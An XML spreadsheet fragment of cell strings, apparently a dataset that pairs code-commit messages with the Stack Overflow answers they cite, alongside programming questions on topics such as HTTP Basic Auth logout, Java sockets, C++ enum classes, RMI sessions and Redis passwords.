    <t>Basic Authentication wasn't designed to manage logging out. You can do it, but not completely automatically.
What you have to do is have the user click a logout link, and send a ‘401 Unauthorized’ in response, using the same realm and at the same URL folder level as the normal 401 you send requesting a login.
They must be directed to input wrong credentials next, eg. a blank username-and-password, and in response you send back a “You have successfully logged out” page. The wrong/blank credentials will then overwrite the previous correct credentials.
In short, the logout script inverts the logic of the login script, only returning the success page if the user isn't passing the right credentials.
The question is whether the somewhat curious “don't enter your password” password box will meet user acceptance. Password managers that try to auto-fill the password can also get in the way here.
Edit to add in response to comment: re-log-in is a slightly different problem (unless you require a two-step logout/login obviously). You have to reject (401) the first attempt to access the relogin link, than accept the second (which presumably has a different username/password). There are a few ways you could do this. One would be to include the current username in the logout link (eg. /relogin?username), and reject when the credentials match the username.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;declare @x int = 1, @y int = @x;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gives the error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Must declare the scalar variable &amp;quot;@x&amp;quot;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I read through the &lt;a href="https://learn.microsoft.com/en-us/sql/t-sql/language-elements/declare-local-variable-transact-sql?view=sql-server-ver16" rel="nofollow noreferrer"&gt;Microsoft documentation for the DECLARE keyword&lt;/a&gt; along with some other sources, but none thoroughly explained this behavior. There is only a part specifying:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;multiple variables can be specified and assigned values.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My reasoning is that, similar to evaluating expressions in a SELECT statement, all declarations occur simultaneously with no guarantee of order. Or, as SQL server parses the line, it doesn't run the DECLARE command until it reaches the end of the line. When &lt;code&gt;@y int = @x&lt;/code&gt; is reached, &lt;code&gt;@x&lt;/code&gt; does not exist because the DECLARE command for &lt;code&gt;@x&lt;/code&gt; hasn't run yet.&lt;/p&gt;
&lt;p&gt;What is the correct answer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C244</t>
  </si>
  <si>
    <t>Restrict registrations to a specifc domain
was the request to do this at the application level as a whole or to allow an Org basis?
Also, was it just registration specifically or login as well?
If its at the app level then this might be a viable approach (although this quite old so devise may have something better by now):
http://stackoverflow.com/questions/6448969/how-can-i-restrict-access-to-all-devise-controllers-by-ip-address</t>
  </si>
  <si>
    <t>Build a class like the following and place it in
RAILS_ROOT/lib/blacklist_constraint.rb
.
class BlacklistConstraint
  def initialize
    if Rails.env == 'development' or Rails.env == 'test'
      @whitelist = ['59.120.201.20', '59.120.201.21'].freeze
    else
      @whitelist = ['59.120.201.20', '59.120.201.21'].freeze
    end
  end
  def matches?(request)
[email protected]
?(request.remote_ip)
  end
end
... and in your routes.rb file...
match "*", :constraints =&gt; BlacklistConstraint.new, :controller =&gt; "blacklist", :action =&gt; "my_access_denied_action"
You may need to load the class in an initializer, or modify your
config.autoload_paths += %W(#{Rails.root}/lib)
in
config/application.rb
(Rails3.x).</t>
  </si>
  <si>
    <t xml:space="preserve">I need to create several applications that all share a Microsoft SQL Server database.  These include ASP.NET web applications, WPF desktop applications, and probably the odd console app every now and then.
I'd like to use the ADO.NET Entity Framework for data access, extend its objects for my business logic, and bind those objects to controls in my UI.
How can I do this in each of my applications without repeating myself too much?  If the database schema or my business logic changes, then I want an easy (or automatic) way to update all my applications.
How should I architect this system?
Update: I've asked follow-up questions...  
[external-link] 
[external-link]
</t>
  </si>
  <si>
    <t>C245</t>
  </si>
  <si>
    <t>Started to use LinkedBlockingQueue
#### The LinkedBlockingQueue should help make this easier.
I am referencing *(emphasis on **referencing**)* a StackOverflow answer
from
[MouseEvent](http://stackoverflow.com/questions/13115784/sending-a-message-to-all-clients-client-server-communication).</t>
  </si>
  <si>
    <t>The below answer, is not recommended for a full fledged server, as for this you should use Java EE with servlets, web services etc.
This is only intended where a few computers want to connect to perform a specific task, and using simple Java sockets is not a general problem. Think of distributed computing or multi-player gaming.
EDIT:
I've - since first post - greatly updated this architecture, now tested and thread-safe. Anybody who needs it may download it
here
.
Simply use (directly, or by subclassing)
Server
and
Client
,
start()
them, and everything is ready. Read the inline comments for more powerful options.
While communication between clients are fairly complicated, I'll try to simplify it, the most possible.
Here are the points, in the server:
Keeping a list of connected clients.
Defining a thread, for server input.
Defining a queue of the received messages.
A thread polling from the queue, and work with it.
Some utility methods for sending messages.
And for the client:
Defining a thread, for client input.
Defining a queue of the received messages.
A thread polling from the queue, and work with it.
Here's the Server class:
public class Server {
    private ArrayList&lt;ConnectionToClient&gt; clientList;
    private LinkedBlockingQueue&lt;Object&gt; messages;
    private ServerSocket serverSocket;
    public Server(int port) {
        clientList = new ArrayList&lt;ConnectionToClient&gt;();
        messages = new LinkedBlockingQueue&lt;Object&gt;();
        serverSocket = new ServerSocket(port);
        Thread accept = new Thread() {
            public void run(){
                while(true){
                    try{
                        Socket s = serverSocket.accept();
                        clientList.add(new ConnectionToClient(s));
                    }
                    catch(IOException e){ e.printStackTrace(); }
                }
            }
        };
        accept.setDaemon(true);
        accept.start();
        Thread messageHandling = new Thread() {
            public void run(){
                while(true){
                    try{
                        Object message = messages.take();
                        // Do some handling here...
                        System.out.println("Message Received: " + message);
                    }
                    catch(InterruptedException e){ }
                }
            }
        };
        messageHandling.setDaemon(true);
        messageHandling.start();
    }
    private class ConnectionToClient {
        ObjectInputStream in;
        ObjectOutputStream out;
        Socket socket;
        ConnectionToClient(Socket socket) throws IOException {
            this.socket = socket;
            in = new ObjectInputStream(socket.getInputStream());
            out = new ObjectOutputStream(socket.getOutputStream());
            Thread read = new Thread(){
                public void run(){
                    while(true){
                        try{
                            Object obj = in.readObject();
                            messages.put(obj);
                        }
                        catch(IOException e){ e.printStackTrace(); }
                    }
                }
            };
            read.setDaemon(true); // terminate when main ends
            read.start();
        }
        public void write(Object obj) {
            try{
                out.writeObject(obj);
            }
            catch(IOException e){ e.printStackTrace(); }
        }
    }
    public void sendToOne(int index, Object message)throws IndexOutOfBoundsException {
        clientList.get(index).write(message);
    }
    public void sendToAll(Object message){
        for(ConnectionToClient client : clientList)
            client.write(message);
    }
}
And here for the Client class:
public class Client {
    private ConnectionToServer server;
    private LinkedBlockingQueue&lt;Object&gt; messages;
    private Socket socket;
    public Client(String IPAddress, int port) throws IOException{
        socket = new Socket(IPAddress, port);
        messages = new LinkedBlokingQueue&lt;Object&gt;();
        server = new ConnecionToServer(socket);
        Thread messageHandling = new Thread() {
            public void run(){
                while(true){
                    try{
                        Object message = messages.take();
                        // Do some handling here...
                        System.out.println("Message Received: " + message);
                    }
                    catch(InterruptedException e){ }
                }
            }
        };
        messageHandling.setDaemon(true);
        messageHandling.start();
    }
    private class ConnectionToServer {
        ObjectInputStream in;
        ObjectOutputStream out;
        Socket socket;
        ConnectionToServer(Socket socket) throws IOException {
            this.socket = socket;
            in = new ObjectInputStream(socket.getInputStream());
            out = new ObjectOutputStream(socket.getOutputStream());
            Thread read = new Thread(){
                public void run(){
                    while(true){
                        try{
                            Object obj = in.readObject();
                            messages.put(obj);
                        }
                        catch(IOException e){ e.printStackTrace(); }
                    }
                }
            };
            read.setDaemon(true);
            read.start();
        }
        private void write(Object obj) {
            try{
                out.writeObject(obj);
            }
            catch(IOException e){ e.printStackTrace(); }
        }
    }
    public void send(Object obj) {
        server.write(obj);
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to set up a React Native app using Expo and Firebase auth.&lt;/p&gt;
&lt;p&gt;I am trying to persist the auth across app close / opens using &lt;code&gt;getReactNativePersistence&lt;/code&gt; but &lt;code&gt;getReactNativePersistence&lt;/code&gt; isn't exported from the &lt;code&gt;@firebase/auth&lt;/code&gt; package.&lt;/p&gt;
&lt;p&gt;I have posted on Firebase GitHub issues page and they mentioned I need to configure your app to resolve firebase/auth imports to the 'react-native' paths defined at &lt;a href="https://github.com/firebase/firebase-js-sdk/blob/main/packages/auth/package.json#L21" rel="nofollow noreferrer"&gt;https://github.com/firebase/firebase-js-sdk/blob/main/packages/auth/package.json#L21&lt;/a&gt;? as seen &lt;a href="https://github.com/firebase/firebase-js-sdk/issues/8798#issuecomment-2666960691" rel="nofollow noreferrer"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My firebase config looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { getReactNativePersistence, initializeAuth } from '@firebase/auth';
const firebaseConfig = {
  apiKey: EXPO_PUBLIC_FIREBASE_API_KEY,
  authDomain: EXPO_PUBLIC_FIREBASE_AUTH_DOMAIN,
  projectId: EXPO_PUBLIC_FIREBASE_PROJECT_ID,
  storageBucket: EXPO_PUBLIC_FIREBASE_STORAGE_BUCKET,
  messagingSenderId: EXPO_PUBLIC_FIREBASE_MESSAGING_SENDER_ID,
  appId: EXPO_PUBLIC_FIREBASE_APP_ID,
};
const app = initializeApp(firebaseConfig);
const auth = initializeAuth(app, {
  persistence: getReactNativePersistence(ReactNativeAsyncStorage)
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can see the example repo &lt;a href="https://github.com/stretch0/react-native-test-app/blob/main/firebaseConfig.ts" rel="nofollow noreferrer"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How do I configure Expo to resolve the React Native bundle of firebase/auth instead of the web bundle?&lt;/p&gt;
&lt;p&gt;I have tried updating the metro bundler to resolve the specific module&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const { getDefaultConfig } = require('metro-config');
module.exports = (async () =&amp;gt; {
  const {
    resolver: { sourceExts, assetExts },
  } = await getDefaultConfig();
  return {
    resolver: {
      assetExts: assetExts.filter(ext =&amp;gt; ext !== 'svg'),
      sourceExts: [...sourceExts, 'svg'],
      extraNodeModules: {
        '@firebase/auth': require.resolve('@firebase/auth/react-native'),
      },
    },
  };
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get the the following error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Error [ERR_PACKAGE_PATH_NOT_EXPORTED]: Package subpath './react-native' is not defined by &amp;quot;exports&amp;quot; in /Users/andrewmccallum/Projects/personal/tester-app/node_modules/@firebase/auth/package.json.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How can I configure this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C246</t>
  </si>
  <si>
    <t>Change client/server phase to enum classes
enum class, unlike enum, has names local to the enum itself, so
ServerPhase::COMPLETE is separate from ClientPhase::COMPLETE, see https://stackoverflow.com/questions/18335861/why-is-enum-class-preferred-over-plain-enum</t>
  </si>
  <si>
    <t>C++ has two kinds of enum:
enum classes
Plain enums
Here are a couple of examples on how to declare them:
 enum class Color { red, green, blue }; // enum class
 enum Animal { dog, cat, bird, human }; // plain enum 
What is the difference between the two?
enum classes - enumerator names are local to the enum and their values do not implicitly convert to other types (like another enum or int)
Plain enums - where enumerator names are in the same scope as the enum and their values implicitly convert to integers and other types
Example:
enum Color { red, green, blue };					// plain enum 
enum Card { red_card, green_card, yellow_card };	// another plain enum 
enum class Animal { dog, deer, cat, bird, human };	// enum class
enum class Mammal { kangaroo, deer, human };		// another enum class
void fun() {
        //-----------------------------------------------
	// examples of bad use of plain enum (not safe)
	Color color = Color::red;
	Card card = Card::green_card;
	int num = color;	// no error (bad)
	if (color == Card::red_card) // no error (not safe, bad)
		cout &lt;&lt; "bad" &lt;&lt; endl;
	if (card == Color::green)	// no error (not safe, bad)
		cout &lt;&lt; "bad" &lt;&lt; endl;
        //-----------------------------------------------
        //-----------------------------------------------
	// examples of good use of enum classes (safe)
	Animal a = Animal::deer;
	Mammal m = Mammal::deer;
	int num2 = a;	// error (good)
	if (m == a)		    // error (good)
		cout &lt;&lt; "bad" &lt;&lt; endl;
	if (a == Mammal::deer) // error (good)
		cout &lt;&lt; "bad" &lt;&lt; endl;
        //-----------------------------------------------
}
Conclusion:
enum classes should be preferred because they cause fewer surprises that could potentially lead to bugs.</t>
  </si>
  <si>
    <t xml:space="preserve">Last week I implemented a date validation in our front end, a combination of ASP.NET and heavily dependent on lots of JavaScript code to avoid server round-trips until a form is actually saved.  I felt it clumsy that this rule check is not done on the server, but our current architecture and performance requirements prevent this.  It's out of my hands for now.
Ideally, this check should be done in both places, but then the server side check would be done with neat, typed, C#, and immediately visible to developers working on that BO, and the client side check is actually done by not even a copy, which is dodgy, but completely different code.
What ways could there be to actually duplicate the server side check on the client side?  Using a rule engine, and having an identical rule applied by two trusted rule engines on each side, actually delegating the server check to be done by JavaScript, which is then registered in the rendered client seems like another option, but seems challenging.
Any ideas on this rather academic versus practical question? 
</t>
  </si>
  <si>
    <t>C247</t>
  </si>
  <si>
    <t>Implementing server sessions for the bank server
- bank server creates a session on login
- session can be terminated by calling logout
- the client can choose to create a session on demand
ref: https://stackoverflow.com/questions/13632442/how-to-organize-rmi-client-server-architecture
Signed-off-by: harb7nger &lt;n.edwin.anthony@gmail.com&gt;</t>
  </si>
  <si>
    <t>You need two remote object classes.
The first one is obtained via Naming.lookup(); it is a singleton; and it contains a login() method.
This method returns the second remote object, which is not a singleton, not registered in the Registry, and is created anew for every return value. This object contains all the banking methods and also a logout() method, which unexports it; it probably also implements the Unreferenced interface so it can detect a dead client, and unexport itself. Because it exists once per client, it can hold client state, and because it can only be obtained by a successful login step it solves your security problem.
public interface Login extends Remote
{
    Session login(String username, char[] password /* or whatever */)
        throws LoginException, RemoteException;
}
public interface Session extends Remote
{
    void logout() throws RemoteException;
    void deposit(...) throws RemoteException;
    void withdraw(...) throws RemoteException;
}
public class LoginImpl extends UnicastRemoteObject implements Login
{
    public Session login(String username, char[] password)
        throws LoginException, RemoteException
    {
        // username/password check; if it fails throw a LoginException
        return new SessionImpl(username); // or whatever
    }
}
public class SessionImpl extends UnicastRemoteObject implements Session, Unreferenced
{
    public void logout() throws RemoteException
    {
        unexportObject(this, true);
    }
    public void unreferenced()
    {
        unexportObject(this, true); // needs to be in a try/catch block of course
    }
    // etc
}
I described this as the Remote Session pattern in my book in 2001.
Of course you also need transport layer security: see javax.rmi.ssl.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to convert RAW image data into a bitmap, however when populating the &lt;code&gt;palPalEntry&lt;/code&gt; values I get a range error.&lt;/p&gt;
&lt;p&gt;Drilling down into the &lt;code&gt;Winapi.Windows&lt;/code&gt; unit, I see the declaration is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tagLOGPALETTE = record
  palVersion: Word;
  palNumEntries: Word;
  palPalEntry: array[0..0] of TPaletteEntry;
end;
TLogPalette = tagLOGPALETTE;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As far as I have it, it should be &lt;code&gt;palPalEntry: array[0..254] of TPaletteEntry;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
&lt;p&gt;I am using Delphi 12 Community Edition.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C248</t>
  </si>
  <si>
    <t>Add useJUnitPlatform for all modules
* Enable Gradle test-support for all samples.
* "Fix" for coverage failure org.springframework.integration.samples.barrier.ApplicationTests#contextLoads(); AmqpConnectException: java.net.ConnectException: Connection refused
~ inspired by ".. we generally use a JUnit @rule to skip the test if the broker's not available." - Gary Russell
@see https://stackoverflow.com/a/38747559</t>
  </si>
  <si>
    <t>Somewhat similar to Rajkishan's answer that didn't work for me:
This is what worked for me instead:
@SpringBootApplication
public class MyTestsApp {
    @Bean
    @Primary
    public CachingConnectionFactory rabbitAdmin() {
        return Mockito.mock(CachingConnectionFactory.class);
    }
}
@RunWith(SpringRunner.class)
@SpringBootTest(classes = {MyTestsApp.class})
@ActiveProfiles(profiles = "test")
public class MyTests {
}</t>
  </si>
  <si>
    <t xml:space="preserve">I'm implementing an SOA at a large company, and I'm not sure which web service specifications (WS-*) actually make sense to implement. At a minimum, I'm looking at WS-Addressing, WS-Security, WS-Eventing, and WS-ReliableMessaging. However, there are [external-link] that look interesting, but I don't know which ones are widely adapted. I don't want to implement a standard (and force all the developers to follow them) if they're not mature or necessary.
EDIT:
I'm asking this question not about a specific situation, but in general. There are quite a few WS-* standards that don't seem to have a lot of practical use (at least to me), so I'm really curious about which ones are widely used.
Thanks for your help!
KA
</t>
  </si>
  <si>
    <t>C249</t>
  </si>
  <si>
    <t>Allow to specify redis password
This is needed if the redis (broker) uses password authentication.
https://stackoverflow.com/questions/7537905/redis-set-a-password-for-redis</t>
  </si>
  <si>
    <t>To set the password, edit your redis.conf file, find this line
# requirepass foobared
Then uncomment it and change foobared to your password.  Make sure you choose something pretty long, 32 characters or so would probably be good, it's easy for an outside user to guess upwards of 150k passwords a second, as the notes in the config file mention.
To authenticate with your new password using predis, the syntax you have shown is correct.  Just add password as one of the connection parameters.
To shut down redis... check in your config file for the pidfile setting, it will probably be
pidfile /var/run/redis.pid
From the command line, run:
cat /var/run/redis.pid
That will give you the process id of the running server, then just kill the process using that pid:
kill 3832
Update
I also wanted to add, you could also make the /etc/init.d/redis-server stop you're used to work on your live server.  All those files in /etc/init.d/ are just shell scripts, take the redis-server script off your local server, and copy it to the live server in the same location, and then just look what it does with vi or whatever you like to use, you may need to modify some paths and such, but it should be pretty simple.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An ETL job snapshotting geospatial data from postgres/postgis to snowflake started failing recently, with a &lt;code&gt;Max LOB size exceeded&lt;/code&gt; error message. We tracked the issue down to one offending row, but curiously, this row &lt;strong&gt;had previously and successfully already been  inserted&lt;/strong&gt; to snowflake, as is.&lt;/p&gt;
&lt;p&gt;Our ETL job first copies the data from postgres to a staging snowflake table, where the geospatial column is stored as a GeoJSON VARIANT. Then, it copies the staging data to a production DB, where the GeoJSON VARIANT is cast to a geography  using &lt;code&gt;to_geography&lt;/code&gt;. The error occurs in this second step, and no changes were made to the job since encountering the error.&lt;/p&gt;
&lt;p&gt;A good way to exemplify this issue would be to note how I can successfully re-insert the (now offending, but previously not offending) row in question into a new table from the production table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;insert into test_db.test_schema.test_table
select polygon_geography
from db_prod.schema_prod.table_prod
where uuid::varchar = '550e8400-e29b-41d4-a716-446655440000'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but fail to insert it when I roundtrip cast it to and then from a GeoJSON VARIANT:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;insert into test_db.test_schema.test_table
select to_geography(st_asgeojson(polygon_geography))
from db_prod.schema_prod.table_prod
where uuid::varchar = '550e8400-e29b-41d4-a716-446655440000'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above fails with &lt;code&gt;Max LOB size (8388608) exceeded, actual size of parsed column is 8408491&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;My questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;why 8388608? shouldn't 16777216 (16MB) be the limit?&lt;/li&gt;
&lt;li&gt;what's going on here?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C25</t>
  </si>
  <si>
    <t xml:space="preserve"> StreamService: remove circulary dependency
Read more: http://stackoverflow.com/questions/8002951/grails-service-class-cross-ref</t>
  </si>
  <si>
    <t>Grails isn't able to inject when there are circular references. You should actually be getting an exception along the lines of FactoryBean is not fully initialized yet. There's a JIRA issue about this where they stated they won't be fixing this, as it's more to do with Spring than Grails (http://jira.grails.org/browse/GRAILS-5080)
However, there is a workaround that is cited in the JIRA and I can verify does work with Grails 2.0.RC1. In SecondService, make it protected def firstService and add def grailsApplication below that and then add the method def initialize() { this.firstService = grailsApplication.mainContext.firstService }. Lastly, in BootStrap.groovy, add def firstService and then in the init closure, add secondService.initialize(). Not a pretty solution, but this will get everything hooked up the way you want it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;this's first app for me , i tried to use api from my website into my app , when i open the app it say field to connect and it's dont show any data from website&lt;/p&gt;
&lt;p&gt;note that : i use kotlin + android studio last version&lt;/p&gt;
&lt;p&gt;i have checked my website and api via Postman and it's work perfect , so i think the problem in my app&lt;/p&gt;
&lt;p&gt;here's my full code&lt;/p&gt;
&lt;p&gt;AdMobHelper.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import android.app.Activity
import com.google.android.gms.ads.AdRequest
import com.google.android.gms.ads.AdView
import com.google.android.gms.ads.MobileAds
object AdMobHelper {
    fun initializeAdMob(activity: Activity) {
        MobileAds.initialize(activity) {}
    }
    fun loadBannerAd(adView: AdView) {
        val adRequest = AdRequest.Builder().build()
        adView.loadAd(adRequest)
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ApiService.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import retrofit2.Call
import retrofit2.http.GET
interface ApiService {
    @GET(&amp;quot;jobs/&amp;quot;) // Use the correct endpoint
    fun getJobs(): Call&amp;lt;List&amp;lt;JobModel&amp;gt;&amp;gt;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;JobAdapter.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import android.widget.ImageView
import android.widget.TextView
import androidx.recyclerview.widget.RecyclerView
import com.bumptech.glide.Glide
class JobAdapter(private val jobs: List&amp;lt;JobModel&amp;gt;) :
    RecyclerView.Adapter&amp;lt;JobAdapter.JobViewHolder&amp;gt;() {
    class JobViewHolder(view: View) : RecyclerView.ViewHolder(view) {
        val jobImage: ImageView = view.findViewById(R.id.jobImage)
        val jobName: TextView = view.findViewById(R.id.jobName)
        val jobDetails: TextView = view.findViewById(R.id.jobDetails)
    }
    override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): JobViewHolder {
        val view = LayoutInflater.from(parent.context).inflate(R.layout.item_job, parent, false)
        return JobViewHolder(view)
    }
    override fun onBindViewHolder(holder: JobViewHolder, position: Int) {
        val job = jobs[position]
        holder.jobName.text = job.name
        holder.jobDetails.text = job.app_contect
        Glide.with(holder.itemView.context).load(job.app_image).into(holder.jobImage)
    }
    override fun getItemCount(): Int = jobs.size
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;JobModel.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
data class JobModel(
    val name: String,
    val app_contect: String,
    val app_image: String
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MainActivity.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import android.os.Bundle
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.recyclerview.widget.LinearLayoutManager
import androidx.recyclerview.widget.RecyclerView
import com.google.android.gms.ads.AdRequest
import com.google.android.gms.ads.AdView
import com.google.android.gms.ads.MobileAds
import retrofit2.Call
import retrofit2.Callback
import retrofit2.Response
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
class MainActivity : AppCompatActivity() {
    private lateinit var recyclerView: RecyclerView
    private lateinit var adView: AdView
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        // Initialize RecyclerView
        recyclerView = findViewById(R.id.recyclerView)
        recyclerView.layoutManager = LinearLayoutManager(this)
        // Initialize AdMob
        MobileAds.initialize(this) {}
        adView = findViewById(R.id.adView)
        adView.loadAd(AdRequest.Builder().build())
        // Check internet connection
        if (!NetworkUtils.isOnline(this)) {
            Toast.makeText(this, &amp;quot;ÙŠØ¬Ø¨ Ø£Ù† ØªØ³ØªØ®Ø¯Ù… Ø§Ù„Ø¥Ù†ØªØ±Ù†Øª Ù„Ù„ØªØµÙØ­ØŒ Ø­Ø§ÙˆÙ„ Ù„Ø§Ø­Ù‚Ù‹Ø§.&amp;quot;, Toast.LENGTH_LONG).show()
            return
        }
        // Fetch data from API
        val retrofit = Retrofit.Builder()
            .baseUrl(&amp;quot;https://trainermods.net/api/&amp;quot;)
            .addConverterFactory(GsonConverterFactory.create())
            .build()
        val apiService = retrofit.create(ApiService::class.java)
        apiService.getJobs().enqueue(object : Callback&amp;lt;List&amp;lt;JobModel&amp;gt;&amp;gt; {
            override fun onResponse(call: Call&amp;lt;List&amp;lt;JobModel&amp;gt;&amp;gt;, response: Response&amp;lt;List&amp;lt;JobModel&amp;gt;&amp;gt;) {
                if (response.isSuccessful &amp;amp;&amp;amp; response.body() != null) {
                    recyclerView.adapter = JobAdapter(response.body()!!)
                } else {
                    Toast.makeText(this@MainActivity, &amp;quot;Ø§Ù„Ø¨ÙŠØ§Ù†Ø§Øª ØºÙŠØ± ØµØ§Ù„Ø­Ø©&amp;quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onFailure(call: Call&amp;lt;List&amp;lt;JobModel&amp;gt;&amp;gt;, t: Throwable) {
                Toast.makeText(this@MainActivity, &amp;quot;ÙØ´Ù„ ØªØ­Ù…ÙŠÙ„ Ø§Ù„Ø¨ÙŠØ§Ù†Ø§Øª: ${t.message}&amp;quot;, Toast.LENGTH_SHORT).show()
            }
        })
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;NetworkUtils.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import android.content.Context
import android.net.ConnectivityManager
import android.net.NetworkCapabilities
object NetworkUtils {
    fun isOnline(context: Context): Boolean {
        val connectivityManager =
            context.getSystemService(Context.CONNECTIVITY_SERVICE) as ConnectivityManager
        val network = connectivityManager.activeNetwork ?: return false
        val capabilities = connectivityManager.getNetworkCapabilities(network) ?: return false
        return capabilities.hasTransport(NetworkCapabilities.TRANSPORT_WIFI) ||
                capabilities.hasTransport(NetworkCapabilities.TRANSPORT_CELLULAR)
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;RetrofitInstance.kt&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.khm.jobstest
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
object RetrofitInstance {
    private const val BASE_URL = &amp;quot;https://trainermods.net/api/&amp;quot;
    val retrofit: Retrofit by lazy {
        Retrofit.Builder()
            .baseUrl(BASE_URL)
            .addConverterFactory(GsonConverterFactory.create())
            .build()
    }
    fun getRetrofitInstance(): Retrofit {
        return retrofit
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;AndroidManifest.xml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&amp;lt;manifest xmlns:android=&amp;quot;http://schemas.android.com/apk/res/android&amp;quot;
    xmlns:tools=&amp;quot;http://schemas.android.com/tools&amp;quot;&amp;gt;
    &amp;lt;!-- Ø¥Ø°Ù† Ø§Ù„ÙˆØµÙˆÙ„ Ø¥Ù„Ù‰ Ø§Ù„Ø¥Ù†ØªØ±Ù†Øª --&amp;gt;
    &amp;lt;uses-permission android:name=&amp;quot;android.permission.INTERNET&amp;quot;/&amp;gt;
    &amp;lt;application
        android:allowBackup=&amp;quot;true&amp;quot;
        android:icon=&amp;quot;@mipmap/ic_launcher&amp;quot;
        android:label=&amp;quot;@string/app_name&amp;quot;
        android:roundIcon=&amp;quot;@mipmap/ic_launcher_round&amp;quot;
        android:supportsRtl=&amp;quot;true&amp;quot;
        android:theme=&amp;quot;@style/Theme.JobTest&amp;quot;
        tools:targetApi=&amp;quot;31&amp;quot;&amp;gt;
        &amp;lt;!-- Ø¥Ø¶Ø§ÙØ© App ID Ù„Ø¥Ø¹Ù„Ø§Ù†Ø§Øª AdMob --&amp;gt;
        &amp;lt;meta-data
            android:name=&amp;quot;com.google.android.gms.ads.APPLICATION_ID&amp;quot;
            android:value=&amp;quot;ca-app-pub-3940256099942544~3347511713&amp;quot;/&amp;gt;
        &amp;lt;!-- ØªØ¹Ø±ÙŠÙ MainActivity Ù…Ø¹ ØªØ­Ø¯ÙŠØ¯ android:exported --&amp;gt;
        &amp;lt;activity android:name=&amp;quot;.MainActivity&amp;quot;
            android:exported=&amp;quot;true&amp;quot;&amp;gt;
            &amp;lt;intent-filter&amp;gt;
                &amp;lt;action android:name=&amp;quot;android.intent.action.MAIN&amp;quot;/&amp;gt;
                &amp;lt;category android:name=&amp;quot;android.intent.category.LAUNCHER&amp;quot;/&amp;gt;
            &amp;lt;/intent-filter&amp;gt;
        &amp;lt;/activity&amp;gt;
    &amp;lt;/application&amp;gt;
&amp;lt;/manifest&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;activity_main.xml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&amp;lt;LinearLayout xmlns:android=&amp;quot;http://schemas.android.com/apk/res/android&amp;quot;
    xmlns:ads=&amp;quot;http://schemas.android.com/apk/res-auto&amp;quot;
    android:layout_width=&amp;quot;match_parent&amp;quot;
    android:layout_height=&amp;quot;match_parent&amp;quot;
    android:orientation=&amp;quot;vertical&amp;quot;&amp;gt;
    &amp;lt;com.google.android.gms.ads.AdView
        android:id=&amp;quot;@+id/adView&amp;quot;
        android:layout_width=&amp;quot;match_parent&amp;quot;
        android:layout_height=&amp;quot;wrap_content&amp;quot;
        ads:adSize=&amp;quot;BANNER&amp;quot;
        ads:adUnitId=&amp;quot;ca-app-pub-3940256099942544/6300978111&amp;quot; /&amp;gt;
    &amp;lt;androidx.recyclerview.widget.RecyclerView
        android:id=&amp;quot;@+id/recyclerView&amp;quot;
